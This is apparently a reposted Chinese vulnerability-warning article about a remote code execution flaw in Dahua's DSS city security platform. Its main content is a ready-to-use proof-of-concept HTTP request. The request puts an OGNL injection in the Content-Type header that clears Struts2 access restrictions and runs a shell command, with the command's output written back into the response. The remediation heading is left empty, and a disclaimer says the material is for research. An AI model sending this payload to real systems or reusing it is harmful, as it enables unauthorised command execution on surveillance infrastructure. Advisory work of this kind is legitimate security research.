-
暂无
-
高危
大华DSS-平安城市解决方案是大华技术提供的一套全面、可靠的智能安防解决方案,以技术创新为驱动力,致力于提升城市整体安全水平。该方案基于先进的人工智能和物联网技术,为城市提供了集视频监控、报警系统、人脸识别、车辆管理、数据分析等功能于一体的综合安防管理平台。
-
大华DSS
0x05 POC
POST /config/user_toLoginPage.action HTTP/1.1Host: {{Hostname}}Connection: closeContent-Type: %{(#nike='multipart/form-data').(#dm=.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}Cache-Control: no-cachePragma: no-cacheUser-Agent: Java/1.8.0_333Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Length: 0
0x06 修复建议
原文始发于微信公众号(浅安安全):漏洞预警 | 大华DSS远程代码执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论